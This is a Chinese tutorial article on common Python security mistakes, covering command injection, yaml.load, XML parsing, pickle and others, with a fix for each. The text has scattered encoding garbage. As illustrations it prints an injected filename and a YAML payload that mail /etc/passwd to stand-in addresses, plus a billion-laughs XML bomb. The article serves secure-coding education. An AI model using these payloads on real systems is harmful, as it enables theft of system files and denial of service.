目錄
- 一����、輸入注入
- 二���、assert 語句(Assert statements)
- 三���、計(jì)時(shí)攻擊(Timing attacks)
- 四、臨時(shí)文件(Temporary files)
- 五�����、使用 yaml.load
- 六���、解析 XML(Parsing XML)
- 七�、受污染的 site-packages 或 import 路徑
- 八、序列化 Pickles
- 九����、使用系統(tǒng) Python 運(yùn)行時(shí)并且不修復(fù)它
- 十、不修復(fù)依賴關(guān)系
一���、輸入注入
注入攻擊非常廣泛而且很常見�,注入有很多種類,它們影響所有的語言����、框架和環(huán)境����。
SQL 注入是直接編寫 SQL 查詢(而非使用 ORM) 時(shí)將字符串字面量與變量混合��。可以通過https://www.jb51.net/article/187001.htm
這個(gè)鏈接查看 SQL 注入所有可能發(fā)生的復(fù)雜方式����。
命令注入可能在使用 popen、subprocess�、os.system 調(diào)用一個(gè)進(jìn)程并從變量中獲取參數(shù)時(shí)發(fā)生,當(dāng)調(diào)用本地命令時(shí)��,有人可能會(huì)將某些值設(shè)置為惡意值��。
下面是個(gè)簡(jiǎn)單的腳本�,使用用戶提供的文件名調(diào)用子進(jìn)程:
import subprocess
def transcode_file(request, filename):
command = 'ffmpeg -i "{source}" output_file.mpg'.format(source=filename)
subprocess.call(command, shell=True) # a bad idea!
攻擊者會(huì)將 filename 的值設(shè)置為“; cat / etc / passwd | mail them@domain.com 或者其他同樣危險(xiǎn)的東西�。
修復(fù):
如果你使用了 Web 框架,可以用附帶的實(shí)用程序?qū)斎脒M(jìn)行清理�,除非有充分的理由����,否則不要手動(dòng)構(gòu)建 SQL 查詢,大多數(shù) ORM 都具有內(nèi)置的消毒方法。
對(duì)于 shell�,可以使用 shlex 模塊正確地轉(zhuǎn)義輸入�。
二、assert 語句(Assert statements)
不要使用 assert 語句來防止用戶訪問不應(yīng)訪問的代碼段����。
def foo(request, user):
assert user.is_admin, “user does not have access”
# secure code...
現(xiàn)在��,默認(rèn)情況下�����,Python 以 __debug__ 為 true 來執(zhí)行腳本����,但在生產(chǎn)環(huán)境中�����,通常使用優(yōu)化運(yùn)行�,這將會(huì)跳過 assert 語句并直接轉(zhuǎn)到安全代碼��,而不管用戶是否是 is_admin���。
修復(fù):
僅在與其他開發(fā)人員進(jìn)行通信時(shí)使用 assert 語句��,例如在單元測(cè)試中或?yàn)榱朔乐共徽_的 API 使用�。
三�、計(jì)時(shí)攻擊(Timing attacks)
計(jì)時(shí)攻擊本質(zhì)上是一種通過計(jì)時(shí)比較提供值所需時(shí)間來暴露行為和算法的方式��。計(jì)時(shí)攻擊需要精確性�����,所以通常不能用于高延遲的遠(yuǎn)程網(wǎng)絡(luò)��。由于大多數(shù) Web 應(yīng)用程序涉及可變延遲��,因此幾乎不可能在 HTTP Web 服務(wù)器上編寫計(jì)時(shí)攻擊����。
但是��,如果你有提示輸入密碼的命令行應(yīng)用程序�����,則攻擊者可以編寫一個(gè)簡(jiǎn)單的腳本來計(jì)算將其值與實(shí)際密碼進(jìn)行比較所需的時(shí)間���。
修復(fù):
使用在 Python 3.5 中引入的 secrets.compare_digest 來比較密碼和其他私密值���。
四、臨時(shí)文件(Temporary files)
要在 Python 中創(chuàng)建臨時(shí)文件��,通常使用 mktemp() 函數(shù)生成一個(gè)文件名�,然后使用該名稱創(chuàng)建一個(gè)文件���。 這是不安全的,因?yàn)榱硪粋€(gè)進(jìn)程可能會(huì)在調(diào)用 mktemp() 和隨后嘗試通過第一個(gè)進(jìn)程創(chuàng)建文件之間的空隙創(chuàng)建一個(gè)同名文件��。這意味著應(yīng)用程序可能加載錯(cuò)誤的數(shù)據(jù)或暴露其他的臨時(shí)數(shù)據(jù)����。
如果調(diào)用不正確的方法�����,則最新版本的 Python 會(huì)拋出運(yùn)行警告�����。
修復(fù):
如果需要生成臨時(shí)文件�,請(qǐng)使用 tempfile 模塊并使用 mkstemp�。
五����、使用 yaml.load
引用 PyYAML 文檔:
警告:使用從不可信源接收到的數(shù)據(jù)來調(diào)用 yaml.load 是不安全的! yaml.load 和pickle.load 一樣強(qiáng)大��,所以可以調(diào)用任何 Python 函數(shù)����。
在流行的 Python 項(xiàng)目 Ansible 中這個(gè)例子��,你可以將此值作為(有效)YAML 提供給 Ansible Vault�,它使用文件中提供的參數(shù)調(diào)用 os.system()���。
!!python/object/apply:os.system ["cat /etc/passwd | mail me@hack.c"]
所以��,從用戶提供的值中有效地加載 YAML 文件會(huì)讓應(yīng)用對(duì)攻擊打開大門��。
修復(fù):
總是不優(yōu)先使用 yaml.safe_load���,除非你有一個(gè)非常好的理由。
六���、解析 XML(Parsing XML)
如果你的應(yīng)用程序要加載���、解析 XML 文件,則你可能正在使用 XML 標(biāo)準(zhǔn)庫模塊�。通過 XML 的攻擊大多是 DoS 風(fēng)格(旨在使系統(tǒng)崩潰而不是泄露數(shù)據(jù))����,這些攻擊十分常見,特別是在解析外部(即不可信任的)XML 文件時(shí)�。
其中有個(gè)「billion laughs」,因?yàn)樗?payload 通常包含很多(十億)「lols」��?��;旧?,這個(gè)原理是可以在 XML 中使用參照實(shí)體�����,所以當(dāng)解析器將這個(gè) XML 文件加載到內(nèi)存中時(shí)����,它會(huì)消耗數(shù) G 大小的內(nèi)存(RAM)����。
?xml version="1.0"?>
!DOCTYPE lolz [
!ENTITY lol "lol">
!ENTITY lol2 "lol;lol;lol;lol;lol;lol;lol;lol;lol;lol;">
!ENTITY lol3 "lol2;lol2;lol2;lol2;lol2;lol2;lol2;lol2;lol2;lol2;">
!ENTITY lol4 "lol3;lol3;lol3;lol3;lol3;lol3;lol3;lol3;lol3;lol3;">
!ENTITY lol5 "lol4;lol4;lol4;lol4;lol4;lol4;lol4;lol4;lol4;lol4;">
!ENTITY lol6 "lol5;lol5;lol5;lol5;lol5;lol5;lol5;lol5;lol5;lol5;">
!ENTITY lol7 "lol6;lol6;lol6;lol6;lol6;lol6;lol6;lol6;lol6;lol6;">
!ENTITY lol8 "lol7;lol7;lol7;lol7;lol7;lol7;lol7;lol7;lol7;lol7;">
!ENTITY lol9 "lol8;lol8;lol8;lol8;lol8;lol8;lol8;lol8;lol8;lol8;">
]>
lolz>lol9;/lolz>
另一些攻擊使用外部實(shí)體擴(kuò)展�����。XML 支持從外部 URL 引用實(shí)體�����,XML解析器通常會(huì)毫無疑問地獲取并加載該資源��。攻擊者可以規(guī)避防火墻并訪問受限制的資源����,因?yàn)樗姓?qǐng)求都是由內(nèi)部可信的 IP 地址創(chuàng)建的����,而不是來自外部�。
需要考慮的另一種情況是依賴的第三方軟件包需要解碼 XML ��,例如配置文件�、遠(yuǎn)程 API�����。你甚至可能不知道某個(gè)依賴關(guān)系會(huì)將這些類型的攻擊置之不理���。
修復(fù):
使用 defusedxml 替換標(biāo)準(zhǔn)庫模塊,它增加了針對(duì)這些類型攻擊的安全防護(hù)�。
七、受污染的 site-packages 或 import 路徑
Python 的 import 系統(tǒng)非常靈活����,當(dāng)你想要為測(cè)試寫補(bǔ)丁或重載核心功能時(shí),這是非常棒的�。
但這卻是 Python 中最大的安全漏洞之一。
安裝第三方軟件包,無論是在虛擬環(huán)境中還是全局(通常不鼓勵(lì))都會(huì)讓你看到這些軟件包中的安全漏洞�。有一些發(fā)布到 PyPi 的軟件包與流行的軟件包具有相似的名稱,但是卻執(zhí)行了任意代碼�。
需要考慮的另一種情況是依賴的依賴�����,他們可能包含漏洞���,他們也可以通過導(dǎo)入系統(tǒng)覆蓋Python 中的默認(rèn)行為。
修復(fù):
看看 http://PyUp.io 及其安全服務(wù)�����,為所有應(yīng)用程序使用虛擬環(huán)境�����,并確保全局的 site-packages 盡可能干凈���,檢查包簽名。
八�、序列化 Pickles
反序列化 pickle 數(shù)據(jù)和 YAML 一樣糟糕。Python 類可以聲明一個(gè) __reduce__ 方法����,該方法返回一個(gè)字符串,或一個(gè)可調(diào)用的元組以及使用 pickle 序列化時(shí)調(diào)用的參數(shù)��。攻擊者可以使用它來包含對(duì)其中一個(gè)子進(jìn)程模塊的引用��,以在主機(jī)上運(yùn)行任意命令�。
修復(fù):
切勿使用 pickle 反序列化不受信任或未經(jīng)身份驗(yàn)證來源的數(shù)據(jù)��。改用另一種序列化模式(如JSON)���。
九����、使用系統(tǒng) Python 運(yùn)行時(shí)并且不修復(fù)它
大多數(shù) POSIX 系統(tǒng)都自帶有一個(gè) Python 2 版本(通常是舊版本)����。
有時(shí)候 Python(即 CPython 是用 C 語言編寫的) 解釋器本身存在漏洞, C 中的常見安全問題與內(nèi)存分配有關(guān)�����,所以大多是緩沖區(qū)溢出錯(cuò)誤,CPython 多年來一直存在一些溢出漏洞�����,每個(gè)漏洞都在后續(xù)版本中進(jìn)行了修復(fù)���。也就是說��,如果及時(shí)升級(jí) python 運(yùn)行時(shí)�����,就很安全�。
修復(fù):
為生產(chǎn)應(yīng)用程序安裝最新版本的 Python�����,并及時(shí)安裝修復(fù)更新����!
十���、不修復(fù)依賴關(guān)系
類似于不修補(bǔ) python 運(yùn)行時(shí)�,還需要定期修補(bǔ)依賴關(guān)系��。
修復(fù):
使用像 PyUp.io 這樣的服務(wù)來檢查更新����,向應(yīng)用程序提出 pr,并運(yùn)行測(cè)試以保持軟件包是最新的�。
到此這篇關(guān)于詳細(xì)總結(jié)Python常見的安全問題的文章就介紹到這了,更多相關(guān)Python安全問題內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家�����!
您可能感興趣的文章:- 使用bandit對(duì)目標(biāo)python代碼進(jìn)行安全函數(shù)掃描的案例分析
- Python通過kerberos安全認(rèn)證操作kafka方式
- 線程安全及Python中的GIL原理分析
- python線程安全及多進(jìn)程多線程實(shí)現(xiàn)方法詳解
- 詳解python實(shí)現(xiàn)線程安全的單例模式
- 利用python批量給云主機(jī)配置安全組的方法教程
- Python簡(jiǎn)單實(shí)現(xiàn)安全開關(guān)文件的兩種方式
- python smtplib模塊發(fā)送SSL/TLS安全郵件實(shí)例
- Python操作sqlite3快速����、安全插入數(shù)據(jù)(防注入)的實(shí)例
